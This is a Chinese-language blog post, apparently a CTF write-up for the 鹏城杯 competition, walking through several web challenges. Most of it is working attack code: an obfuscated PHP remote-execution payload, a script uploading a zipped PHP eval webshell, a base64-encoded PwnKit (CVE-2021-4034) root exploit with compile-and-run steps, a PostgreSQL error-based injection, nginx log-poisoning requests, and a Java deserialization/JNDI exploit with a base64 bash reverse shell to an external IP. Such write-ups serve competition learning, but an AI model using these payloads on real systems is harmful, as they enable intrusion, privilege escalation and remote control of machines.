鹏城杯
|
0
|
298
|
比赛

622 字
|
8 分钟

鹏城杯

趁大佬打谷歌ctf偷偷摸一把

简单的php

直接原题:https://xz.aliyun.com/t/9360
照着打

code=[~%8C%86%8C%8B%9A%92][!%FF]([~%91%9A%87%8B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]()));

改ua进行rce

压缩包

之前的原题,直接写一个超长的文件名到压缩包还有一个shell,然后让其解压报错但是shell文件正常解压。找到路径直接rce:

import zipfile
import io
import requests
import base64
mf = io.BytesIO()
with zipfile.ZipFile(mf, mode="w", compression=zipfile.ZIP_STORED) as zf:
    zf.writestr('1.php', b'@<?php eval($_POST[1])?>')
    zf.writestr('A' * 5000, b'AAAAA')
with open("shell.zip", "wb") as f:
    f.write(mf.getvalue())
url = 'http://192.168.1.110:8521/'
with open("shell.zip", "rb") as f:
    content = f.read()
data = {"content": base64.b64encode(content)}
print(data)
re = requests.post(url=url, data=data)
print(re.text)

高手高手高高手

git源码泄露,审计源码。在extension.php里面有压缩包解压,而且没有对里面的文件进行检测

$zip = new ZipArchive;
if($zip->open($_FILES['extension-upload']['tmp_name']) === TRUE)
{
    $zip->extractTo(NAVIGATE_PATH.'/plugins/'.$extension_name);
    $zip->close();
    $layout->navigate_notification(t(374, "Item installed successfully."), false);
}

后台弱口令admin:admin123
在扩展那里,有加载本地插件选项。将shell加入压缩包并上传,即可在目录/plugins下保存木马。蚁剑连接,反弹shell,发现flag不在根目录下和其他文件夹种。提权:


发现pkexec,拿现成exp打:

echo "LyoKICogYmxhc3R5LXZzLXBrZXhlYy5jIC0tIGJ5IGJsYXN0eSA8cGV0ZXJAaGF4eC5pbj4gCiAqIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQogKiBQb0MgZm9yIENWRS0yMDIxLTQwMzQsIHNob3V0IG91dCB0byBRdWFseXMKICoKICogY3RmIHF1YWxpdHkgZXhwbG9pdAogKgogKiBibGEgYmxhIGlycmVzcG9uc2libGUgZGlzY2xvc3VyZQogKgogKiAtLSBibGFzdHkgLy8gMjAyMi0wMS0yNQogKi8KCiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgojaW5jbHVkZSA8c3lzL3N0YXQuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8ZmNudGwuaD4KCnZvaWQgZmF0YWwoY2hhciAqZikgewogICAgcGVycm9yKGYpOwogICAgZXhpdCgtMSk7Cn0KCnZvaWQgY29tcGlsZV9zbygpIHsKICAgIEZJTEUgKmYgPSBmb3BlbigicGF5bG9hZC5jIiwgIndiIik7CiAgICBpZiAoZiA9PSBOVUxMKSB7CiAgICAgICAgZmF0YWwoImZvcGVuIik7CiAgICB9CgogICAgY2hhciBzb19jb2RlW109CiAgICAgICAgIiNpbmNsdWRlIDxzdGRpby5oPlxuIgogICAgICAgICIjaW5jbHVkZSA8c3RkbGliLmg+XG4iCiAgICAgICAgIiNpbmNsdWRlIDx1bmlzdGQuaD5cbiIKICAgICAgICAidm9pZCBnY29udigpIHtcbiIKICAgICAgICAiICByZXR1cm47XG4iCiAgICAgICAgIn1cbiIKICAgICAgICAidm9pZCBnY29udl9pbml0KCkge1xuIgogICAgICAgICIgIHNldHVpZCgwKTsgc2V0ZXVpZCgwKTsgc2V0Z2lkKDApOyBzZXRlZ2lkKDApO1xuIgogICAgICAgICIgIHN0YXRpYyBjaGFyICphX2FyZ3ZbXSA9IHsgXCJzaFwiLCBOVUxMIH07XG4iCiAgICAgICAgIiAgc3RhdGljIGNoYXIgKmFfZW52cFtdID0geyBcIlBBVEg9L2JpbjovdXNyL2Jpbjovc2JpblwiLCBOVUxMIH07XG4iCiAgICAgICAgIiAgZXhlY3ZlKFwiL2Jpbi9zaFwiLCBhX2FyZ3YsIGFfZW52cCk7XG4iCiAgICAgICAgIiAgZXhpdCgwKTtcbiIKICAgICAgICAifVxuIjsKCiAgICBmd3JpdGUoc29fY29kZSwgc3RybGVuKHNvX2NvZGUpLCAxLCBmKTsKICAgIGZjbG9zZShmKTsKCiAgICBzeXN0ZW0oImdjYyAtbyBwYXlsb2FkLnNvIC1zaGFyZWQgLWZQSUMgcGF5bG9hZC5jIik7Cn0KCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsKICAgIHN0cnVjdCBzdGF0IHN0OwogICAgY2hhciAqYV9hcmd2W109eyBOVUxMIH07CiAgICBjaGFyICphX2VudnBbXT17CiAgICAgICAgImxvbCIsCiAgICAgICAgIlBBVEg9R0NPTlZfUEFUSD0uIiwKICAgICAgICAiTENfTUVTU0FHRVM9ZW5fVVMuVVRGLTgiLAogICAgICAgICJYQVVUSE9SSVRZPS4uL0xPTCIsCiAgICAgICAgIkdJT19VU0VfVkZTPSIsCiAgICAgICAgTlVMTAogICAgfTsKCiAgICBwcmludGYoIlt+XSBjb21waWxlIGhlbHBlci4uXG4iKTsKICAgIGNvbXBpbGVfc28oKTsKCiAgICBpZiAoc3RhdCgiR0NPTlZfUEFUSD0uIiwgJnN0KSA8IDApIHsKICAgICAgICBpZihta2RpcigiR0NPTlZfUEFUSD0uIiwgMDc3NykgPCAwKSB7CiAgICAgICAgICAgIGZhdGFsKCJta2RpciIpOwogICAgICAgIH0KICAgICAgICBpbnQgZmQgPSBvcGVuKCJHQ09OVl9QQVRIPS4vbG9sIiwgT19DUkVBVHxPX1JEV1IsIDA3NzcpOyAKICAgICAgICBpZiAoZmQgPCAwKSB7CiAgICAgICAgICAgIGZhdGFsKCJvcGVuIik7CiAgICAgICAgfQogICAgICAgIGNsb3NlKGZkKTsKICAgIH0KCiAgICBpZiAoc3RhdCgibG9sIiwgJnN0KSA8IDApIHsKICAgICAgICBpZihta2RpcigibG9sIiwgMDc3NykgPCAwKSB7CiAgICAgICAgICAgIGZhdGFsKCJta2RpciIpOwogICAgICAgIH0KICAgICAgICBGSUxFICpmcCA9IGZvcGVuKCJsb2wvZ2NvbnYtbW9kdWxlcyIsICJ3YiIpOwogICAgICAgIGlmKGZwID09IE5VTEwpIHsKICAgICAgICAgICAgZmF0YWwoImZvcGVuIik7CiAgICAgICAgfQogICAgICAgIGZwcmludGYoZnAsICJtb2R1bGUgIFVURi04Ly8gICAgSU5URVJOQUwgICAgLi4vcGF5bG9hZCAgICAyXG4iKTsKICAgICAgICBmY2xvc2UoZnApOwogICAgfQoKICAgIHByaW50ZigiW35dIG1heWJlIGdldCBzaGVsbCBub3c/XG4iKTsKCiAgICBleGVjdmUoIi91c3IvYmluL3BrZXhlYyIsIGFfYXJndiwgYV9lbnZwKTsKfQ==" | base64 -d > /tmp/a.c
gcc /tmp/a.c -o exp
chmod a+x ./exp
./exp

即可提权。然后在/root下找到flag,发现有加密


移32位得到flag

easygo

pgsql注入,没有任何过滤,直接进行报错注入:

192.168.1.115:8080/juice/1'AND 7778=CAST((SELECT flag FROM public.super_secret_table limit 1)::text AS NUMERIC)--

简单包含

nginx日志注入
首先在UA注入<?=show_source('/var/www/html/flag.php');?>
发包

POST / HTTP/1.1
Host: 192.168.1.113
User-Agent: <?=show_source('/var/www/html/flag.php');?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://192.168.1.113
Connection: close
Referer: http://192.168.1.113/php.bak?
Upgrade-Insecure-Requests: 1

flag=/etc/hosts

使用/xxx/../绕过waf

POST / HTTP/1.1
Host: 192.168.1.113
User-Agent: qwe
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://192.168.1.113
Connection: close
Referer: http://192.168.1.113/php.bak?
Upgrade-Insecure-Requests: 1

flag=/var/ran/../log/nginx/access.log

得到flag
PCL{bc58644f-f757-11ec-9edf-5224002d2b29}

can_u_login

第五空间原题,结果靶机坏了,第二天早上才能打,痛失一题XD

Ez_Java(复现)

差一点,太晚了直接睡了,第二天醒不来XD。由于黑名单很多,看来直接把cc链全ban了

this.add("javax.management.BadAttributeValueExpException");
            this.add("org.apache.commons.collections.keyvalue.TiedMapEntry");
            this.add("org.apache.commons.collections.functors.ChainedTransformer");
            this.add("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
            this.add("org.apache.commons.collections4.functors.ChainedTransformer");
            this.add("org.apache.commons.collections4.functors.InstantiateTransformer");
            this.add("com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter");

然后在知识星球刚好有人提过用cb链打jndi注入。直接贴一个exp:

package com.example.Ez_Java;

import com.sun.rowset.JdbcRowSetImpl;
import org.apache.commons.beanutils.BeanComparator;

import java.io.*;
import java.lang.reflect.Field;
import java.sql.SQLException;
import java.util.Base64;
import java.util.PriorityQueue;

public class Exp {
    public static void main(String[] args) throws IllegalAccessException, NoSuchFieldException, ClassNotFoundException, IOException, SQLException {
        BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        queue.add("1");
        queue.add("2");
        Field field2 = comparator.getClass().getDeclaredField("property");
        field2.setAccessible(true);
        field2.set(comparator, "parameterMetaData");
        JdbcRowSetImpl test = new JdbcRowSetImpl();
        test.setDataSourceName("rmi://47.96.173.116:8888/Object");
        Field field = queue.getClass().getDeclaredField("queue");
        field.setAccessible(true);
        Object[] queryArray =  (Object[]) field.get(queue);
        queryArray[0] = test;

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(queue);
        System.out.println(new String(Base64.getEncoder().encode(bos.toByteArray())));
//        ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());
//        ObjectInputStream ois = new ObjectInputStream(bis);
//        ois.readObject();
    }
}

原理和原来的cb链差不多,但是ban了TemplateImpl,所以重getOutputProperties这里换成jndi的getParameterMetaData,然后就触发了jndi注入。
然后题目需要高版本绕过。直接下一个工具https://github.com/wyzxxz/jndi_tool
vps上跑一下:

java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4xNzMuMTE2LzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" el-win/el-linux/groovy

然后直接rce了。

cb打jndi高版本
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																					

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇